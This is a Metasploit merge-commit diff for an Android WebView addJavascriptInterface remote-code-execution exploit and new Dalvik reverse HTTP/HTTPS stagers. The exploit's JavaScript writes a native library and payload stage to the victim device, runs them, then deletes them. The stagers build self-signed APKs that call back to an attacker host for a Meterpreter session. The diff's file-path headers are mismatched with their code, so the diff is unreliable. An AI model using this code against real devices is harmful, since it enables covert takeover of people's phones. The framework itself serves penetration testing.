Merge branch 'pr-android-bins' of https://github.com/jvennix-r7/metasploit-framework into new-android-bins

Author: joevennix

data/android/apk/res/drawable-mdpi/icon.png

@@ -31,5 +31,36 @@ def java_string(str)
     [str.length].pack("N") + str
   end
 
+  def string_sub(data, placeholder="", input="")
+    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+  end
+
+  def generate_cert
+    x509_name = OpenSSL::X509::Name.parse(
+      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
+      )
+    key  = OpenSSL::PKey::RSA.new(1024)
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = 1
+    cert.subject = x509_name
+    cert.issuer = x509_name
+    cert.public_key = key.public_key
+
+    # Some time within the last 3 years
+    cert.not_before = Time.now - rand(3600*24*365*3)
+
+    # From http://developer.android.com/tools/publishing/app-signing.html
+    # """
+    # A validity period of more than 25 years is recommended.
+    #
+    # If you plan to publish your application(s) on Google Play, note
+    # that a validity period ending after 22 October 2033 is a
+    # requirement. You can not upload an application if it is signed
+    # with a key whose validity expires before that date.
+    # """
+    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+    return cert, key
+  end
 end
 

data/android/apk/res/layout/main.xml

@@ -58,9 +58,9 @@ def initialize(info = {})
         ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
         ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
       ],
-      'Platform'       => 'linux',
-      'Arch'           => ARCH_ARMLE,
-      'DefaultOptions' => { 'PrependFork' => true },
+      'Platform'       => 'android',
+      'Arch'           => ARCH_DALVIK,
+      'DefaultOptions' => { 'PAYLOAD'  => 'android/meterpreter/reverse_tcp', },
       'Targets'        => [ [ 'Automatic', {} ] ],
       'DisclosureDate' => 'Dec 21 2012',
       'DefaultTarget'  => 0,
@@ -86,26 +86,45 @@ def on_request_exploit(cli, req, browser)
     send_response_html(cli, html)
   end
 
+  def ndkstager(stagename)
+    localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so')
+    data = File.read(localfile, :mode => 'rb')
+    data.gsub!('PLOAD', stagename)
+  end
+
   def js
+    stagename = Rex::Text.rand_text_alpha(5)
     %Q|
       function exec(obj) {
         // ensure that the object contains a native interface
         try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
 
         // get the runtime so we can exec
         var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
-        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
+        var runtime = m.invoke(null, null);
+        var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
+        var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}";
 
         // get the process name, which will give us our data path
-        var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
+        var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
         var ch, path = '/data/data/';
         while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
-        path += '/#{Rex::Text.rand_text_alpha(8)}';
-
-        // build the binary, chmod it, and execute it
-        m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
-        m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
-        m.invoke(null, null).exec([path]);
+        var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
+        var stagePath = path + '/#{stagename}.apk';
+        var dexPath = path + '/#{stagename}.dex';
+
+        // build the library and chmod it
+        runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
+        runtime.exec(['chmod', '700', libraryPath]).waitFor();
+
+        // build the stage, chmod it, and load it
+        runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
+        runtime.exec(['chmod', '700', stagePath]).waitFor();
+
+        runtime.load(libraryPath);
+        runtime.exec(['rm', stagePath]).waitFor();
+        runtime.exec(['rm', libraryPath]).waitFor();
+        runtime.exec(['rm', dexPath]).waitFor();
 
         return true;
       }

lib/msf/core/payload/dalvik.rb

@@ -0,0 +1,58 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Dalvik
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Dalvik Reverse HTTP Stager',
+      'Description'   => 'Tunnel communication over HTTP',
+      'Author'        => 'anwarelmakrahy',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'Handler'       => Msf::Handler::ReverseHttp,
+      'Stager'        => {'Payload' => ""}
+      ))
+
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
+  end
+
+  def generate_jar(opts={})
+    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
+    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
+    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+
+    jar = Rex::Zip::Jar.new
+
+    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    jar.add_file("classes.dex", fix_dex_header(classes))
+
+    files = [
+      [ "AndroidManifest.xml" ],
+      [ "resources.arsc" ]
+    ]
+
+    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.build_manifest
+
+    cert, key = generate_cert
+    jar.sign(key, cert, [cert])
+
+    jar
+  end
+
+end

modules/exploits/android/browser/webview_addjavascriptinterface.rb

@@ -0,0 +1,57 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Dalvik
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Dalvik Reverse HTTPS Stager',
+      'Description'   => 'Tunnel communication over HTTPS',
+      'Author'        => 'anwarelmakrahy',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'Handler'       => Msf::Handler::ReverseHttps,
+      'Stager'        => {'Payload' => ""}
+    ))
+
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
+  end
+
+  def generate_jar(opts={})
+    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
+    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
+    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+
+    jar = Rex::Zip::Jar.new
+
+    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + host + ":" + port)
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    jar.add_file("classes.dex", fix_dex_header(classes))
+
+    files = [
+      [ "AndroidManifest.xml" ],
+      [ "resources.arsc" ]
+    ]
+
+    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.build_manifest
+
+    cert, key = generate_cert
+    jar.sign(key, cert, [cert])
+
+    jar
+  end
+end

modules/payloads/stagers/android/reverse_http.rb

@@ -24,10 +24,11 @@ def initialize(info = {})
       'Handler'		=> Msf::Handler::ReverseTcp,
       'Stager'		=> {'Payload' => ""}
     ))
-  end
 
-  def string_sub(data, placeholder, input)
-    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
   end
 
   def generate_jar(opts={})
@@ -37,44 +38,18 @@ def generate_jar(opts={})
 
     string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [
       [ "AndroidManifest.xml" ],
-      [ "res", "drawable-mdpi", "icon.png" ],
-      [ "res", "layout", "main.xml" ],
       [ "resources.arsc" ]
     ]
 
     jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
     jar.build_manifest
 
-    x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
-    cert = OpenSSL::X509::Certificate.new
-    cert.version = 2
-    cert.serial = 1
-    cert.subject = x509_name
-    cert.issuer = x509_name
-    cert.public_key = key.public_key
-
-    # Some time within the last 3 years
-    cert.not_before = Time.now - rand(3600*24*365*3)
-
-    # From http://developer.android.com/tools/publishing/app-signing.html
-    # """
-    # A validity period of more than 25 years is recommended.
-    #
-    # If you plan to publish your application(s) on Google Play, note
-    # that a validity period ending after 22 October 2033 is a
-    # requirement. You can not upload an application if it is signed
-    # with a key whose validity expires before that date.
-    # """
-    # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
-    cert.not_after = Time.at( 0x78045d81  + rand( 0x7fffffff - 0x78045d81 ))
-
+    cert, key = generate_cert
     jar.sign(key, cert, [cert])
 
     jar